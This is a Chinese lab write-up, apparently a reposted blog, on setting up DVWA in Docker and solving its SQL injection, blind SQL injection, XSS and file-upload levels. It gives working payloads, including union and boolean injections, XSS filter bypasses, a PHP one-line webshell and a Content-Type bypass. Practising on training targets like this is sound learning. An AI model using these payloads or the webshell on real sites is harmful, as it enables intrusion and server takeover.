Docker搭建DVWA靶场以及刷题记录

news2024/11/24 15:31:01

Docker搭建DVWA靶场以及刷题记录

  • Docker搭建DVWA靶场以及刷题记录
    • 靶场搭建
  • 刷题记录
    • SQL Injection
      • Low
      • Medium
      • High
      • Impossible
    • SQL Injection(Blind)
      • Low
      • Medium
      • High
    • XSS (Reflected)
      • Low
      • Medium
      • High
    • XSS (Stored)
      • Low
      • Medium
      • High
    • File Upload
      • Low
      • Medium
      • High

Docker搭建DVWA靶场以及刷题记录

靶场搭建

  1. 获取资源
docker pull sagikazarmark/dvwa
  1. 启动
docker run  -p 8087:80 --name dvwa sagikazarmark/dvwa
  1. 初始化

在这里插入图片描述
在这里插入图片描述

刷题记录

SQL Injection

Low

在这里插入图片描述
输入

1'//有报错

在这里插入图片描述
可以观察到,入参是被双引号包围的
构造1"#绕过
在这里插入图片描述

两个回显位,之后注入语句参考
在这里插入图片描述

Medium

在这里插入图片描述

id提供了可选值,不能直接输入,BurpSuite抓包修改看是否有效

id=3'&Submit=Submit//回显报错信息

在这里插入图片描述
输入的'被转义了,直接输注入语句

id=3 union select 1,1&Submit=Submit

在这里插入图片描述

High

在这里插入图片描述
在这里插入图片描述
点击提交会回显
在这里插入图片描述

输入特殊语句1',直接回显失败页面,可能是布尔盲注
在这里插入图片描述
还有空回显的页面
在这里插入图片描述

不能盲注,看WriteUp发现是源码设置了limit 1,从而只能检索一行数据

2' union select database(),12 limit 1,1 #

在这里插入图片描述

Impossible

在这里插入图片描述
上边的测试方法都没回显了,试试时间盲注

?id=1' and sleep(5)
?id=1" and sleep(5)
?id=1' and sleep(5) #
?id=1" and sleep(5) #

也没有明显的时间差异

SQL Injection(Blind)

Low

在这里插入图片描述
可以看到查询成功回显User ID exists in the database.,否则回显User ID is MISSING from the database.

1 //User ID exists in the database.
1' //User ID is MISSING from the database.
1'# //User ID exists in the database.

之后就是查数据了,参考Less-5

1'  and left(database(),1)='d' #
......

Medium

在这里插入图片描述
抓包修改id值即可

id=5 and length(database()) = 4&Submit=Submit

在这里插入图片描述

High

在这里插入图片描述
同样也是查询成功回显User ID exists in the database.,否则回显User ID is MISSING from the database.

1 //User ID exists in the database.
1' //User ID is MISSING from the database.
1'# //User ID exists in the database.

查询数据即可

1' and length(database()) = 4#

XSS (Reflected)

Low

在这里插入图片描述
输入注入语句,直接弹窗成功

<script>alert(1)</script>

Medium

同样输入,但是这次不行了,看下是被如何转义了

<script>alert(1)</script>

在这里插入图片描述
输入的<script>没了
在这里插入图片描述
闭合pre标签试试

</pre><script>alert(1)</script>

在这里插入图片描述

还是被转义了,这次大小写混合绕过了

</pre><Script>alert(1)</script>

High

输入注入语句,查看页面发现输入还是在pre标签内

<script>alert(1)</script>

在这里插入图片描述

尝试闭合

</pre><Script>alert(1)</script>

在这里插入图片描述
逐步测试

</pre>123

在这里插入图片描述

</pre><a href="javascript:alert('XSS');">Click me</a>
</pre><a href="#" onclick="alert('XSS')">Click me</a>//点击连接成功弹窗,感觉是屏蔽了`script`

源码如下,确实正则过滤了script
在这里插入图片描述

XSS (Stored)

Low

在这里插入图片描述
输入注入语句成功弹窗

<script>alert(1)</script>

在这里插入图片描述

Medium

<script>alert("Medium")</script>在这里插入图片描述
输入的<script>没了,大小写和双写混合都没绕过

<Script>alert(321)</script>

在这里插入图片描述

看下输入框处的代码,看了WP是对第一个输入框进行攻击
在这里插入图片描述
先修改第一个框的输入限制改为30,再输入攻击语句成功弹窗
在这里插入图片描述

High

存储型的练习没有提供删除功能,每次可以重置一下,点击Setup/Rese tDB
在这里插入图片描述
和反射型的一样对script进行了过滤,换一种攻击语句,同样也是针对第一个输入框进行注入

<a href="#" onclick="alert('XSS')">Click me</a>

File Upload

Low

在这里插入图片描述

直接上传一句话木马

<?php @eval($_POST['cmd']);?>

提示上传成功

../../hackable/uploads/1.php succesfully uploaded!
http://ip:8087/hackable/uploads/1.php //蚁剑成功连接

Medium

在这里插入图片描述

上传一句话木马被提示只允许 JPEG or PNG ,BP抓包确定是否为前端检查,若是则可以抓包修改后缀
在这里插入图片描述

抓包有记录,说明是传到了后端进行的检测,尝试其他绕过方法,修改

Content-Type: image/jpeg
->
Content-Type:application/octet-stream

上传成功了,说明是检查了MIME type
在这里插入图片描述

High

上传一句话木马,同样被提示只允许图片文件,上传图片马参考Less-16
在这里插入图片描述
但是图片没有被按照PHP执行,还需要一个文件包含漏洞的环境,
在这里插入图片描述
新开标签页将Security改为Low,来到靶场下的File Inclusion ,输入图片马地址被成功执行
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2223835.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

zabbix 6.0 监控clickhouse(单机)

zabbix 6.0 LTS已经包含了clickhouse的监控模板&#xff0c;所以我们可以直接使用自带的模板来监控clickhouse了。 0.前置条件 clickhouse 已经安装&#xff0c;我安装的是24.3.5.47zabbix-agent 已经安装并配置。系统是ubuntu 2204 server 1. 新建监控用户 使用xml的方式为…

适用于 Windows 11/10 电脑 的 13 个最佳文件恢复软件

如果您由于系统故障、硬件损坏、人为错误或病毒攻击而丢失了重要文件或文件夹。不用担心&#xff0c;因为我们随时为您提供帮助&#xff01;借助正确的文件恢复工具&#xff0c;您可以立即检索计算机上不同类型的文件。如果你有为您的文件创建备份&#xff0c;你不用担心&#…

juzigei/基于 ThinkPHP+Mysql灵活用工_灵活用工系统_灵活用工平台

基于 ThinkPHPMysql 灵活用工灵活用工平台灵活用工系统灵活用工小程序灵活用工源码灵活用工系统源码 开发语言 ThinkPHPMysql 源码合作 提供完整源代码 软件界面展示 一、企业管理后台 二、运用管理平台 三、手机端

ECharts饼图-饼图自定义样式,附视频讲解与代码下载

引言&#xff1a; 在数据可视化的世界里&#xff0c;ECharts凭借其丰富的图表类型和强大的配置能力&#xff0c;成为了众多开发者的首选。今天&#xff0c;我将带大家一起实现一个饼图图表&#xff0c;通过该图表我们可以直观地展示和分析数据。此外&#xff0c;我还将提供详…

视频播放速度过快怎么办?视频速度调慢的简单方法

视频播放速度过快怎么办&#xff1f;在这个快节奏的时代&#xff0c;我们似乎习惯了迅速浏览和消化信息&#xff0c;视频内容也不例外。然而&#xff0c;有时我们会遇到视频速度过快的问题&#xff0c;这不仅让我们难以捕捉到每一个细节&#xff0c;更可能让我们错失视频所要传…

【ChatGPT插件漏洞三连发之二】零点击Github仓库接管

在我们深入研究细节之前&#xff0c;我们想先解释一下插件上的帐户接管意味着什么。 举个例子&#xff0c;当您安装与您的 GitHub 交互的插件时&#xff0c;此插件会在插件网站上为您创建一个额外的帐户&#xff0c;用于存储您的 GitHub 凭据。使用这些凭据&#xff0c;插件可…

内置数据类型、变量名、字符串、数字及其运算、数字的处理、类型转换

内置数据类型 python中的内置数据类型包括&#xff1a;整数、浮点数、布尔类型&#xff08;以大写字母开头&#xff09;、字符串 变量名 命名变量要见名知意&#xff0c;确保变量名称具有描述性和意义&#xff0c;这样可以使得代码更容易维护&#xff0c;使用_可以使得变量名…

Linux中级(DNS域名解析服务器)

一。产生原因1.IP地址&#xff1a;是互联网上计算机唯一的逻辑地址&#xff0c;通过IP地址实现不同计算机之间的相互通信&#xff0c;每台联网计算机都需要通过IP地址来互相联系和分别&#xff0c;但由于IP地址是由一串容易混淆的数字串构成&#xff0c;人们很难记忆所有计算机…

计算机毕业设计Python+大模型租房推荐系统 租房大屏可视化 租房爬虫 hadoop spark 58同城租房爬虫 房源推荐系统

温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 用到的技术: 1. python…

【独家:AI编程助手Cursor如何revolutionize Java设计模式学习】

【独家:AI编程助手Cursor如何revolutionize Java设计模式学习】 导语 在Java高级编程的世界里,设计模式是每个开发者必须掌握的利器。但是,如何快速理解并灵活运用这些模式呢?让我们一起探索如何借助AI编程助手Cursor,轻松掌握设计模式,提升Java编程技能! 正文 设计模式:J…

opencv - py_ml - py_kmeans

文章目录 1.理解 K-Means 聚类目标理论T 恤尺码问题它是如何工作的&#xff1f; 其他资源 2.OpenCV 中的 K-Means 聚类目标理解参数输入参数输出参数 1.理解 K-Means 聚类 目标 在本章中&#xff0c;我们将理解 K-Means 聚类的概念、其工作原理等。 理论 我们将通过一个常用…

4.2-6 使用Hadoop WebUI

文章目录 1. 查看HDFS集群状态1.1 端口号说明1.2 用主机名访问1.3 主节点状态1.4 用IP地址访问1.5 查看数据节点 2. 操作HDFS文件系统2.1 查看HDFS文件系统2.2 在HDFS上创建目录2.3 上传文件到HDFS2.4 删除HDFS文件和目录 3. 查看YARN集群状态4. 实战总结 1. 查看HDFS集群状态 …

JVM 实战篇(一万字)

此笔记来至于 黑马程序员 内存调优 内存溢出和内存泄漏 内存泄漏&#xff08;memory leak&#xff09;&#xff1a;在Java中如果不再使用一个对象&#xff0c;但是该对象依然在 GC ROOT 的引用链上&#xff0c;这个对象就不会被垃圾回收器回收&#xff0c;这种情况就称之为内…

matlab中,close和close all的区别、clc和clear的区别、

文章目录 1. clear vs. clear all2. clc vs. clear3. hold on vs. hold off4. subplot vs. subplot(221)5. axis tight vs. axis equal6. save vs. saveas总结 在 MATLAB 中&#xff0c;有许多命令和函数在功能上相似&#xff0c;但其用法和效果却有所不同。以下是一些常见的例…

基于SSM+小程序的垃圾分类管理系统(垃圾2)

&#x1f449;文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1、项目介绍 基于SSM小程序的垃圾分类管理系统实现了管理员及用户。 1、管理员功能结构图&#xff0c;管理员功能有个人中心&#xff0c;管理员管理&#xff0c;基础数据管理、论坛管理、垃圾信息管理…

logback 如何将日志输出到文件

如何作 将日志输出到文件需要使用 RollingFileAppender&#xff0c;该 Appender 必须定义 rollingPolicy &#xff0c;另外 rollingPollicy 下必须定义 fileNamePattern 和 encoder <appender name"fileAppender" class"ch.qos.logback.core.rolling.Rollin…

Zabbix企业级分布式监控环境部署

“运筹帷幄之中&#xff0c;决胜千里之外”。在IT运维中&#xff0c;监控占据着重要的地位&#xff0c;按比例来算&#xff0c;说占30%一点也不为过。对IT运维工程师来说&#xff0c;构建一个真正可用的监控告警系统是一项艰巨的任务。在监控系统的开源软件中&#xff0c;可供选…

论文阅读:华为的LiMAC

《LIGHTWEIGHT NEURAL APP CONTROL》 用于app控制的轻量级神经网络 摘要 输入是一个文本目标和一系列过去的移动感知&#xff0c;比如截图和相应的UI树&#xff0c;来生成精确的动作。 针对智能手机固有的计算限制&#xff0c;我们在LiMAC中引入了一个小型Action Transforme…

【安全解决方案】深入解析:如何通过CDN获取用户真实IP地址

一、业务场景 某大型互联网以及电商公司为了防止客户端获取到真实的ip地址&#xff0c;以及达到保护后端业务服务器不被网站攻击&#xff0c;同时又可以让公安要求留存网站日志和排查违法行为&#xff0c;以及打击犯罪的时候&#xff0c;获取不到真实的ip地址&#xff0c;发现…

元数据 - ​媒体管理

媒体管理 Media Management元数据遵循 XMP&#xff08;可扩展元数据平台&#xff09;规范&#xff0c;特别是 xmpMM&#xff08;XMP Media Management&#xff09;命名空间。通过理解和利用这些元数据&#xff0c;可以更好地管理媒体文件的版本、历史记录、派生关系和管理信息&…